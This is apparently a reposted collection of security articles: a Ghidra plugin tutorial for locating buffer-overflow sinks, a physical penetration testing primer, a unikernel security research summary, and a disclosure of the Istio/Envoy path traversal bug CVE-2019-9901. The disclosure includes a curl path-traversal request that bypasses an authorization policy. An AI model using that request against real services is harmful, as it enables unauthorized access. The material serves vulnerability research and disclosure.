In order to detect sinks, we first have to create a list of sinks that can be utilized by our plugin. For the purpose of this post, we will target the sinks that are known to produce buffer overflow vulnerabilities. These sinks can be found in various write-ups, books, and publications. Our plugin will first identify all function calls in a program and check them against our list of sinks to pick out the targets. For each sink, we will identify all of their parent functions and called addresses. By the end of this process, we will have a plugin that can map the calling functions to sinks, and therefore identify sinks that could result in a buffer overflow.

Locating Function Calls

There are various methods to determine whether a program contains sinks. We will be focusing on the below methods, and will discuss each in detail in the following sections:

- Linear Search - Iterate over the text section (executable section) of the binary and check the instruction operand against our predefined list of sinks.
- Cross References (Xrefs) - Utilize Ghidra's built-in identification of cross references and query the cross references to sinks.

Linear Search

The first method of locating all function calls in a program is to do a sequential search. While this method may not be the ideal search technique, it is a great way of demonstrating some of the features in Ghidra's API. Using the below code, we can print out all instructions in our program:

listing = currentProgram.getListing() #get a Listing interface
ins_list = listing.getInstructions(1) #get an Instruction iterator

while ins_list.hasNext(): #go through each instruction and print it out to the console
    ins = ins_list.next()
    print (ins)

Running the above script on CoreFTPServer gives us the following output:

We can see that all of the x86 instructions in the program were printed out to the console. Next, we filter for sinks that are utilized in the program. It is important to check for duplicates, as there could be multiple references to the identified sinks. Building upon the previous code, we now have the following:

sinks = [
    "strcpy", "memcpy", "gets", "memmove", "scanf", "lstrcpy", "strcpyW",
    #...
]

duplicate = []
listing = currentProgram.getListing()
ins_list = listing.getInstructions(1)

while ins_list.hasNext():
    ins = ins_list.next()
    ops = ins.getOpObjects(0)
    try:
        target_addr = ops[0]
        sink_func = listing.getFunctionAt(target_addr)
        sink_func_name = sink_func.getName()
        if sink_func_name in sinks and sink_func_name not in duplicate:
            duplicate.append(sink_func_name)
            print (sink_func_name, target_addr)
    except:
        pass

Now that we have identified a list of sinks in our target binary, we have to locate where these functions are getting called. Since we are iterating through the executable section of the binary and checking every operand against the list of sinks, all we have to do is add a filter for the call instruction. Adding this check to the previous code gives us the following:

sinks = [
    "strcpy", "memcpy", "gets", "memmove", "scanf",
    "strcpyA", "strcpyW", "wcscpy", "_tcscpy", "_mbscpy",
    "StrCpy", "StrCpyA", "lstrcpyA", "lstrcpy",
    #...
]

duplicate = []
listing = currentProgram.getListing()
ins_list = listing.getInstructions(1)

#iterate through each instruction
while ins_list.hasNext():
    ins = ins_list.next()
    ops = ins.getOpObjects(0)
    mnemonic = ins.getMnemonicString()

    #check to see if the instruction is a call instruction
    if mnemonic == "CALL":
        try:
            target_addr = ops[0]
            sink_func = listing.getFunctionAt(target_addr)
            sink_func_name = sink_func.getName()

            #check to see if the function being called is in the sinks list
            if sink_func_name in sinks and sink_func_name not in duplicate:
                duplicate.append(sink_func_name)
                print (sink_func_name, target_addr)
        except:
            pass

Running the above script against CoreFTPServer v1.2 build 505 shows the results for all detected sinks:

Unfortunately, the above code does not detect any sinks in the CoreFTPServer binary. However, we know that this particular version of CoreFTPServer is vulnerable to a buffer overflow and contains the lstrcpyA sink. So, why did our plugin fail to detect any sinks? After researching this question, we discovered that in order to identify the functions that are calling out to an external DLL, we need to use the function manager that specifically handles external functions. To do this, we modified our code so that every time we see a call instruction, we go through all external functions in our program and check them against the list of sinks.
Then, if they are found in the list, we verify that the operand matches the address of the sink. The following is the modified section of the script (note that the external function manager is obtained from the program's function manager):

sinks = [
    "strcpy", "memcpy", "gets", "memmove", "scanf",
    "strcpyA", "strcpyW", "wcscpy", "_tcscpy", "_mbscpy",
    "StrCpy", "StrCpyA", "lstrcpyA", "lstrcpy",
    #...
]

program_sinks = {}
listing = currentProgram.getListing()
ins_list = listing.getInstructions(1)
fm = currentProgram.getFunctionManager()
ext_fm = fm.getExternalFunctions()

#iterate through each of the external functions to build a dictionary
#of external functions and their addresses
while ext_fm.hasNext():
    ext_func = ext_fm.next()
    target_func = ext_func.getName()

    #if the function is a sink then add its address to a dictionary
    if target_func in sinks:
        loc = ext_func.getExternalLocation()
        sink_addr = loc.getAddress()
        sink_func_name = loc.getLabel()
        program_sinks[sink_addr] = sink_func_name

#iterate through each instruction
while ins_list.hasNext():
    ins = ins_list.next()
    ops = ins.getOpObjects(0)
    mnemonic = ins.getMnemonicString()

    #check to see if the instruction is a call instruction
    if mnemonic == "CALL":
        try:
            #get the address of the operand
            target_addr = ops[0]

            #check to see if the address exists in the generated sink dictionary
            if program_sinks.get(target_addr):
                print (program_sinks[target_addr], target_addr, ins.getAddress())
        except:
            pass

Running the modified script against our program shows that we identified multiple sinks that could result in a buffer overflow.

Xrefs

The second and more efficient approach is to identify the cross references to each sink and check which cross references are calling the sinks in our list. Because this approach does not search through the entire text section, it is more efficient. Using the below code, we can identify cross references to each sink:

sinks = [
    "strcpy", "memcpy", "gets", "memmove", "scanf",
    "strcpyA", "strcpyW", "wcscpy", "_tcscpy", "_mbscpy",
    "StrCpy", "StrCpyA", "lstrcpyA", "lstrcpy",
    #...
]

duplicate = []
func = getFirstFunction()

while func is not None:
    func_name = func.getName()

    #check if the function name is in the sinks list
    if func_name in sinks and func_name not in duplicate:
        duplicate.append(func_name)
        entry_point = func.getEntryPoint()
        references = getReferencesTo(entry_point)

        #print cross-references
        print(references)

    #set the function to the next function
    func = getFunctionAfter(func)

Now that we have identified the cross references, we can get an instruction for each reference and add a filter for the call instruction. A final modification is added to include the use of the external function manager:

sinks = [
    "strcpy", "memcpy", "gets", "memmove", "scanf",
    "strcpyA", "strcpyW", "wcscpy", "_tcscpy", "_mbscpy",
    "StrCpy", "StrCpyA", "lstrcpyA", "lstrcpy",
    #...
]

duplicate = []
listing = currentProgram.getListing()
fm = currentProgram.getFunctionManager()
ext_fm = fm.getExternalFunctions()

#iterate through each external function
while ext_fm.hasNext():
    ext_func = ext_fm.next()
    target_func = ext_func.getName()

    #check if the function is in our sinks list
    if target_func in sinks and target_func not in duplicate:
        duplicate.append(target_func)
        loc = ext_func.getExternalLocation()
        sink_func_addr = loc.getAddress()

        if sink_func_addr is None:
            sink_func_addr = ext_func.getEntryPoint()

        if sink_func_addr is not None:
            references = getReferencesTo(sink_func_addr)

            #iterate through all cross references to the potential sink
            for ref in references:
                call_addr = ref.getFromAddress()
                ins = listing.getInstructionAt(call_addr)
                mnemonic = ins.getMnemonicString()

                #print the sink and the address of the sink if
                #the instruction is a call instruction
                if mnemonic == "CALL":
                    print (target_func, sink_func_addr, call_addr)

Running the modified script against CoreFTPServer gives us a list of sinks that could result in a buffer overflow:

Mapping Calling Functions to Sinks

So far, our Ghidra plugin can identify sinks. With this information, we can take it a step further by mapping the calling functions to the sinks. This allows security researchers to visualize the relationship between the sink and its incoming data. For the purpose of this post, we will use the graphviz module to draw a graph. Putting it all together gives us the following code:

from ghidra.program.model.address import Address
from ghidra.program.model.listing.CodeUnit import *
from ghidra.program.model.listing.Listing import *
import sys
import os

#get ghidra root directory
ghidra_default_dir = os.getcwd()

#get ghidra jython directory
jython_dir = os.path.join(ghidra_default_dir, "Ghidra", "Features", "Python", "lib", "Lib", "site-packages")

#insert jython directory into system path
sys.path.insert(0, jython_dir)

from beautifultable import BeautifulTable
from graphviz import Digraph

sinks = [
    "strcpy", "memcpy", "gets", "memmove", "scanf",
    "strcpyA", "strcpyW", "wcscpy", "_tcscpy", "_mbscpy",
    "StrCpy", "StrCpyA", "StrCpyW", "lstrcpy", "lstrcpyA", "lstrcpyW",
    #...
Running the script against our program shows the following graph:

We can see that the calling functions are highlighted in blue and the sink is highlighted in red. The addresses of the calling functions are displayed on the edges pointing to the sink. After conducting some manual analysis, we were able to verify that several of the sinks identified by our Ghidra plugin produced a buffer overflow. The following WinDbg screenshot shows that EIP is overwritten with 0x42424242 as a result of an lstrcpyA function call.

Additional Features

Although visualizing the results in a graph format is helpful for vulnerability analysis, it would also be useful if the user could choose different output formats. The Ghidra API provides several methods for interacting with a user and several ways of outputting data. We can leverage the Ghidra API to allow a user to choose an output format (e.g. text, JSON, graph) and display the results in the chosen format. The example below shows a dropdown menu with three different display formats.
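A rough sketch of how such a prompt could be wired up is shown below, using Ghidra's built-in askChoice() method; the rendering branches are simplified placeholders (assuming the sink_dic structure built by the script above), not the full script:

import json

#ask the user which format to render; askChoice() is part of the
#GhidraScript API and pops up a dropdown dialog
choice = askChoice("Sink Finder", "Choose an output format",
                   ["text", "json", "graph"], "graph")

if choice == "text":
    #one line per caller/sink pair
    for parent, sink_list in sink_dic.items():
        for sink_name, info in sink_list.items():
            print(parent, "->", sink_name, info["call_address"])
elif choice == "json":
    #addresses are Java objects, so stringify them before dumping
    serializable = {}
    for parent, sink_list in sink_dic.items():
        serializable[parent] = {}
        for sink_name, info in sink_list.items():
            serializable[parent][sink_name] = [a.toString() for a in info["call_address"]]
    print(json.dumps(serializable, indent=2))
else:
    pass  #fall through to the graphviz rendering shown earlier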
The full script is available on our GitHub.

Limitations

There are multiple known issues with Ghidra, and one of the biggest for writing an analysis plugin like ours is that the Ghidra API does not always return the correct address of an identified standard function. Unlike IDA Pro, which has a database of function signatures (FLIRT signatures) from multiple libraries that it uses to detect standard function calls, Ghidra comes with only a few export files (similar to signature files) for DLLs, so the standard library detection occasionally fails. Comparing IDA Pro's and Ghidra's disassembly output for CoreFTPServer, we can see that IDA Pro successfully identified and mapped the function lstrcpyA using a FLIRT signature, whereas Ghidra shows only a call to the memory address of the function lstrcpyA.

Although the public release of Ghidra has these limitations, we expect to see improvements that will enhance the standard library analysis and aid in automated vulnerability research.

Conclusion

Ghidra is a powerful reverse engineering tool that can be leveraged to identify potential vulnerabilities. Using Ghidra's API, we were able to develop a plugin that identifies sinks and their parent functions and displays the results in various formats. In our next blog post, we will conduct additional automated analysis using Ghidra and enhance the plugin's vulnerability detection capabilities.

Posted on April 5, 2019 by Somerset Recon and tagged Ghidra Reverse Engineering Plugin Vulnerability Analysis.

Sursa: https://www.somersetrecon.com/blog/2019/ghidra-plugin-development-for-vulnerability-research-part-1
-
How to Perform Physical Penetration Testing

Guest Contributor: Chiheb Chebbi

Abstract

No one can deny that physical security plays a huge role in, and is a necessary aspect of, "Information Security" in general. This article will guide us through many important terminologies in physical security and show us how to perform physical penetration testing. In this article we are going to discover:

Information security and Physical security: The Link
Physical Security Overview
Physical Penetration Testing
Crime prevention through environmental design (CPTED)

After reading this article you can use this document, which contains many useful resources, to help you learn more about physical security and physical penetration testing: Physical Security

Information security and Physical security: The Link

Before diving deep into exploring physical security, some points need to be discussed to avoid any confusion. Many new information security learners assume that the main role of information security professionals is securing computers, servers, and devices in general, but they neglect the fact that the role of the information security professional is to secure "information", and information can be stored using different means, including papers, paper mail, bills, notebooks, and so on. Also, many don't know that the most valuable asset in an organization is not a technical device, nor even a multi-million-dollar datacenter, but "The Human". Yes! In risk management, risks against humans should be mitigated first and most urgently. Thus, securing the physical environment is included in the tasks of risk managers and CISOs (if I am mistaken, please correct me).

For more information, I highly recommend you check this great paper from the SANS Institute: Physical Security and Why It Is Important – SANS Institute

Physical Security Overview

By definition, "Physical security is the protection of personnel, hardware, software, networks and data from physical actions and events that could cause serious loss or damage to an enterprise, agency or institution. This includes protection from fire, flood, natural disasters, burglary, theft, vandalism, and terrorism." [https://searchsecurity.techtarget.com]

Physical security has three important components:

Access control
Surveillance
Testing

As you can see from the definition, your job is also to secure the enterprise from natural disasters and physical accidents.

Physical Threats

The International Information System Security Certification Consortium, or (ISC)², describes the role of information security professionals in the CISSP Study Guide (by Eric Conrad, Seth Misenar and Joshua Feldman) as follows: "Our job as information security professionals is to evaluate risks against our critical assets and deploy safeguards to mitigate those risks. We work in various roles: firewall engineers, penetration testers, auditors, management, etc. The common thread is risk: it is part of our job description."

Risks can be presented in a mathematical way using the following formula:

Risk = Threat x Vulnerability

(Sometimes we add another parameter called "Impact," but for now let's just focus on threats and vulnerabilities.)
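To make the formula concrete, here is a toy calculation on a 1-5 qualitative scale; the scores and scenarios below are invented for illustration and are not taken from any standard:

#a toy risk calculation on a 1-5 qualitative scale; the scores and
#scenarios are made-up examples, not from any standard
def risk(threat, vulnerability, impact=1):
    return threat * vulnerability * impact

#an unlocked server room: likely threat, very exposed, high impact
print(risk(threat=4, vulnerability=5, impact=5))  # 100

#the same threat against a guarded, locked room is far less risky
print(risk(threat=4, vulnerability=2, impact=5))  # 40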
In your day-to-day job you will face many threats. (To avoid confusion between the three terms threat, vulnerability, and risk, check the first section of this article: How to build a Threat Hunting platform using ELK Stack.)

Some physical threats are the following:

Natural environmental threats: disasters, floods, earthquakes, volcanoes, tsunamis, avalanches
Politically motivated threats
Supply and transportation threats

Security Defenses

To defend against physical threats, you need to implement and deploy the right safeguards; for example, you can use a defense-in-depth approach. The major physical safeguards are the following:

Video surveillance
Fences
Security guards
Locks and smart locks
Biometric access controls
Different and well-chosen windows
Mitigating power loss and excess
Guard dogs
Lights
Signs
Man-traps
Different fire suppression and protection systems (soda acid, water, halon gas). The fire extinguisher should be chosen based on the class of fire:

Class A – fires involving solid materials such as wood, paper or textiles.
Class B – fires involving flammable liquids such as petrol, diesel or oils.
Class C – fires involving gases.
Class D – fires involving metals.
Class E – fires involving live electrical apparatus. (Technically, 'Class E' doesn't exist; however, it is used for convenience here.)
Class F – fires involving cooking oils such as in deep-fat fryers.

You can check the different fire extinguishers using this useful link: https://www.marsden-fire-safety.co.uk/resources/fire-extinguishers

Access Control

Access control is vital when it comes to physical security, so I want to take this opportunity to talk a little bit about it. As you may have noticed, many information security concepts are taken from and inspired by the military (team names: Red Team, Blue Team, and so on). Access control is likewise inspired by the military. To represent security policies in a logical way, we use what we call security models. These models are inspired by the Trusted Computing Base (TCB), which is described in the US Department of Defense Standard 5200.28. This standard is also known as the Orange Book. These are the most well-known security models:

Bell-LaPadula Model
Biba Model
Clark-Wilson Model

To learn more about security models, read this document: https://media.techtarget.com/searchSecurity/downloads/29667C05.pdf

Access controls are a form of technical security controls (a control, as a noun, means an entity that checks based on a standard). We have three access control categories:

Mandatory Access Control (MAC): The system checks the identity of a subject and its permissions against the object's permissions. Usually, both subjects and objects carry labels using a ranking system (top secret, confidential, and so on).
Discretionary Access Control (DAC): The object owner is allowed to set permissions for users. Passwords are a form of DAC.
Role-Based Access Control (RBAC): As its name indicates, access is based on assigned roles.

The short sketch after this list illustrates the difference between the three categories.
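All labels, users, and permissions below are invented for the example and are not taken from any standard or product; a minimal sketch:

#toy examples of the three access control categories; every name
#and clearance level here is invented for illustration
CLEARANCE = {"public": 0, "confidential": 1, "secret": 2, "top secret": 3}

#MAC: the system compares the subject's label to the object's label
def mac_allows(subject_label, object_label):
    return CLEARANCE[subject_label] >= CLEARANCE[object_label]

#DAC: the object's owner decides who is on the permission list
dac_acl = {"design_doc.txt": {"alice", "bob"}}
def dac_allows(user, obj):
    return user in dac_acl.get(obj, set())

#RBAC: permissions attach to roles, and users are assigned roles
role_perms = {"guard": {"open_gate"}, "admin": {"open_gate", "rekey_lock"}}
user_roles = {"carol": "guard"}
def rbac_allows(user, action):
    return action in role_perms.get(user_roles.get(user, ""), set())

print(mac_allows("secret", "confidential"))     # True
print(dac_allows("mallory", "design_doc.txt"))  # False
print(rbac_allows("carol", "rekey_lock"))       # False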
Physical Penetration Testing

By now we have acquired a fair understanding of many important aspects of physical security. Let's move on to another point: how to perform a physical penetration test. By definition: "A penetration test, or pen test, is an attempt to evaluate the security of an IT infrastructure by safely trying to exploit vulnerabilities. These vulnerabilities may exist in operating systems, services and application flaws, improper configurations or risky end-user behavior." [www.coresecurity.com]

When it comes to penetration testing, we have three types:

White box pentesting: The pentester knows everything about the target, including physical environment information, employees, IP addresses, host and server information, and so on (within the agreed scope, of course)
Black box pentesting: In this case, the pentester doesn't know anything about the target
Gray box pentesting: A mix of the two types

Usually, penetration testers follow a pentesting standard when performing a penetration testing mission. Standards are a low-level description of how the organization will enforce the policy; in other words, they are used to maintain a minimum level of effective cybersecurity. To learn the difference between standard, policy, procedure, and guideline, check this useful link: https://frsecure.com/blog/differentiating-between-policies-standards-procedures-and-guidelines/

As a penetration tester you can choose from a great number of pentesting standards, such as:

The Open Source Security Testing Methodology Manual (OSSTMM)
The Information Systems Security Assessment Framework (ISSAF)
The Penetration Testing Execution Standard (PTES)
The Payment Card Industry Data Security Standard (PCI DSS)

If you selected The Penetration Testing Execution Standard (PTES), for example (https://media.readthedocs.org/pdf/pentest-standard/latest/pentest-standard.pdf), you need to follow these steps and phases:

Pre-engagement Interactions
Intelligence Gathering
Threat Modeling
Vulnerability Analysis
Exploitation
Post Exploitation
Reporting

(Just click on any step to learn more about it)

The Team

You can't perform a successful physical penetration testing mission without a great team. Wil Allsopp, in his great book Unauthorised Access: Physical Penetration Testing For IT Security Teams, gave a great suggestion for an operations team. He believes that every good physical penetration testing team should contain:

Operator
Team Leader
Coordinator or Planner
Social Engineer
Computer Intrusion Specialist
Physical Security Specialist
Surveillance Specialist

He also gave a great workflow you can use in your mission:

Peerlyst is also loaded with great physical security articles. The following are some of them:

Most Locks are stupid easy to pick
How to become a Hardware Security Specialist
Hardware/Software vendor playbook: Handling vulnerabilities found in your products after launch
The hardware security and firmware security wiki
Becoming a Penetration Tester – Hardware Hacking Part 1
Best practices for securing hardware devices against physical intrusion
[TOOL] Umbrella App: Digital and Physical Security Lessons and Advice in Your Pocket!
Physical Security Blog. Part 1: Why the Physical Security Industry is Dysfunctional
Physical Security: The Missing Piece From Your Cyber Security Puzzle
Physical Security = Information Security, both have almost identical requirements
How to get started with physical security
How Physical security fails: 2 Tales from a Sneaker

Crime prevention through environmental design (CPTED)

Crime prevention through environmental design (CPTED) is a set of design principles used to discourage crime. The concept is simple: buildings and properties are designed to prevent damage from the force of the elements and natural disasters; they should also be designed to prevent crime.
[William Deutsch]

There are four major principles:

Natural Surveillance: Criminals will do everything they can to stay undetected, so we need to keep them under observation by keeping areas bright and by trying to eliminate hiding spots.
Natural Access Control: Relies on doors, fences, shrubs, and other physical elements to keep unauthorized persons out of a particular place if they do not have a legitimate reason for being there.
Territorial Reinforcement: Achieved by giving spatial definitions, such as the subdivision of space into different degrees of public/semi-public/private areas.
Maintenance: The property should be well-maintained.

You can find the full Crime Prevention Through Environmental Design guide in the references section below.

Summary

In this article we explored many aspects of physical security. We started by learning about the relationship between physical security and information security. Later, we dived deep into many terminologies in physical security. Then, we discovered how to perform a physical penetration test and the team required to do it successfully. Finally, we finished the article with a small glimpse of crime prevention through environmental design.

This article was originally posted on Peerlyst.

Sursa: http://brilliancesecuritymagazine.com/op-ed/how-to-perform-physical-penetration-testing/
-
Assessing Unikernel Security

In this “modern” era of software development, the spotlight has bounced from virtual machines on clouds, to containers on clouds, to, currently, container orchestration… on clouds. As the “container wars” rage on, leaving behind multiple evolutionarily (or politically) dead-end implementations, unikernels are on the rise. Unikernels are applications built as specialized, minimal operating systems. While unikernels originated as an academic curiosity in the 90s, the modern crop are primarily focused on running as lightweight paravirtualized guests… on clouds.

While some proponents of unikernels consider them to be the successor to containers, the two are, in fact, fairly different beasts with different tradeoffs. While containers make Unix/POSIX the base abstraction for applications, unikernels declare their own. Some unikernels focus on providing varying levels of POSIX compatibility, while others are based around specific programming languages, providing idiomatic APIs for applications written in those languages. However, the core concept of unikernels goes deeper: their main appeal is not the features that they provide, but rather, those that they don’t. Unikernels intentionally omit a great deal of the functionality typically found in full-featured operating systems, which their developers deemed to be not only unnecessary baggage, but also a potential security risk (as their presence substantially increases the system’s attack surface). Furthermore, those developers often attempt to simplify — and even completely reimplement — major OS components such as the network stack, throwing out what supporters call “cruft” and skeptics call “well-tested” or “mature” code. Advocates claim that unikernels are smaller, nimbler, and more secure by virtue of freeing themselves from the shackles of decades-old operating systems code. Such idealized claims are indeed appealing, but are they actually true?

Our recently-posted whitepaper covers our initial foray into unikernels and focuses on the native aspects of application security as applied to them. Unikernel applications have a threat model unlike that of normal processes running on a standard operating system, Unix container or otherwise; in unikernels, general application code runs entirely within kernel space.

We begin the whitepaper by describing the general threat model of unikernels as compared to that of containers. We then describe several relevant core security features and exploitation mitigations both within and provided by modern operating systems and build toolchains, and explore how these may apply to unikernels. This forms the basis of our methodology for assessing the general correctness and safety of unikernels. We go on to apply this testing methodology to two major open-source unikernel projects, Rumprun and IncludeOS. For each unikernel, we provide a suite of test cases to invoke and identify relevant security protections, and dig into their source and compiled code to uncover further issues.
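As a rough illustration of what checking for such protections can look like in practice, the sketch below (using the pyelftools library; this is an illustrative example, not the whitepaper's test suite) inspects an ELF image for a non-executable stack and stack-canary instrumentation:

#a rough sketch of mitigation-checking, not the whitepaper's actual
#test suite; requires pyelftools (pip install pyelftools)
from elftools.elf.elffile import ELFFile
from elftools.elf.constants import P_FLAGS

def check_mitigations(path):
    with open(path, "rb") as f:
        elf = ELFFile(f)

        #a PT_GNU_STACK segment without the execute flag set
        #indicates a non-executable stack
        nx = False
        for seg in elf.iter_segments():
            if seg["p_type"] == "PT_GNU_STACK":
                nx = not (seg["p_flags"] & P_FLAGS.PF_X)

        #the presence of __stack_chk_fail suggests the image was
        #built with stack canaries (-fstack-protector)
        canary = False
        symtab = elf.get_section_by_name(".symtab")
        if symtab is not None:
            canary = any(sym.name == "__stack_chk_fail"
                         for sym in symtab.iter_symbols())

        print(path, "NX stack:", nx, "stack canary:", canary)

check_mitigations("unikernel.img")  #hypothetical image name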
We also discuss unikernel-specific exploitation techniques and provide example exploit code for common memory corruption vulnerabilities. The presence of these vulnerability classes would enable reliable blind remote exploitation; that is, an attacker could gain arbitrary code execution in ring 0 without any direct knowledge of either the source code or the binary. Other notable vulnerabilities include a brute-force attack that takes advantage of unikernels’ ability to restart almost instantly, and a stack overflow that is able to stomp over the very copy instruction that caused it due to unusual section ordering.

We then document a number of remediation and hardening recommendations for each unikernel and document our disclosure interactions with each project. As part of the latter, we assess the upstream patches made in response to our findings and recommendations. We introduce a series of our own patches that remediate a number of the issues we identified in Rumprun, many of which apply more generally to the Xen Mini-OS kernel on which it is based. These can be found here [1], here [2], and here [3].

To conclude, we contrast the proclaimed security benefits of unikernels with our actual results. We also briefly describe our current and future research into the security pitfalls of another oft-touted “security feature” of unikernels: the complete reimplementation of mature, external-facing OS components such as the network stack. Even if this process does simplify and modernize the relevant code, as unikernel proponents claim, it also throws out decades of edge-case handling and security fixes that have accreted in response to security vulnerabilities. We are concerned that such re-implementation efforts do not show appropriate respect to the maturity of such codebases, and in doing so may reopen Pandora’s box.

As a side note, we will shortly announce several issues that we identified in the MirageOS unikernel but did not cover in our ToorCon XX talk due to disclosure timelines.

NCC Group regularly performs a large number of engagements assessing the security and hardening of applications and services, and the platforms they run on, in, and under, including containers, clouds, PaaSes, embedded runtimes, and specialized sandboxes, to name a few. The authors were drawn to this research by the potential and promise unikernel technology (still) has to build lightweight, performant, robust, and secure services in fundamentally new ways. If you’re building any of the above, especially anything unikernel-based, we’d love to help.

[1] https://github.com/nccgroup/rumprun
[2] https://github.com/nccgroup/src-netbsd
[3] https://github.com/nccgroup/buildrump.sh

Published date: 02 April 2019
Written by: Jeff Dileo and Spencer Michaels

Sursa: https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2019/april/assessing-unikernel-security/
-

CVE-2019-9901 - Istio/Envoy Path traversal

TLDR; I found a path traversal bug in Istio's authorization policy enforcement.

Discovery

About a year ago, as part of a customer project, I started looking at Istio, and I really liked what I saw. In fact, I liked it so much that I decided to submit a talk about it for JavaZone in 2018. My favorite thing about Istio was, and still is, the mutual TLS authentication and authorization with workload-bound certificates with SPIFFE identities. Istio has evolved a lot from the first version, 0.5.0, which I initially looked at, to the 1.1 release. The 0.5.0 authorization policies came in the form of deniers, which sounded a lot like blacklists. The later versions have moved to a positive security model (whitelist), where you can specify which workloads (and/or end users, based on JWT) should be allowed to access certain services. Further restrictions can be specified using a set of protocol-based authorization rules.

I really like the coarse-grained workload authorization, but I'm not too fond of the protocol-based rules. We have seen different parsers interpreting the same thing in different ways way too many times. Some perfect examples of this are in Orange Tsai's brilliant research presented in A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!. I mentioned my concerns about this in some later versions of my Istio talk, but never actually tested it... until now...

The bug

I set up a simple project with a web server and deployed it on Kubernetes. The web application had two endpoints, /public/ and /secret/. I added an authorization policy which tried to grant access to anything below /public/:

rules:
- services: ["backend.fishy.svc.cluster.local"]
  methods: ["GET"]
  paths: ["/public/*"]

I then used standard path traversal from curl:

curl -vvvv --path-as-is "http://backend.fishy.svc.cluster.local:8081/public/../secret/"

And was able to reach /secret/.
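The reason --path-as-is matters is that the policy is evaluated against the raw request path, while the dot-segments are resolved later. A minimal sketch of the mismatch, using Python's posixpath and a naive glob check standing in for the real policy matcher (this is an illustration, not Istio's actual code):

#illustrates why matching the raw path is unsafe: the raw string
#passes a naive "/public/*" check but resolves to /secret
import fnmatch
import posixpath

raw_path = "/public/../secret/"

#the naive policy check sees a path under /public/ and allows it
print(fnmatch.fnmatch(raw_path, "/public/*"))  # True

#after dot-segment resolution the request actually targets /secret
print(posixpath.normpath(raw_path))  # /secret

#normalizing before matching closes the gap
print(fnmatch.fnmatch(posixpath.normpath(raw_path), "/public/*"))  # False

Any enforcement point therefore has to normalize the path before matching it against the policy.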
Timeline

The Istio team was very friendly and responsive and kept me up to date on the progress.

2019-02-18: I sent the initial bug report to the istio-security-vulnerabilities mailbox
2019-02-18: Istio team acknowledges receiving the report
2019-02-20: Istio team reports the bug has been triaged and work started
2019-02-27: I ask some follow-up questions about the mail received on the 20th
2019-02-27: Istio team replies to questions
2019-03-28: Istio team updates me about working with the Envoy team to fix this and plans to release on April 2nd. The Envoy issue was created on the 20th of February: https://github.com/envoyproxy/envoy/issues/6008
2019-04-01: Istio team sends a new update setting April 5th as the new target date
2019-04-05: The security fix is published in Istio versions 1.1.2/1.0.7 and Envoy version 1.9.1. The Envoy bug is assigned CVE-2019-9901

Sursa: https://github.com/eoftedal/writings/blob/master/published/CVE-2019-9901-path-traversal.md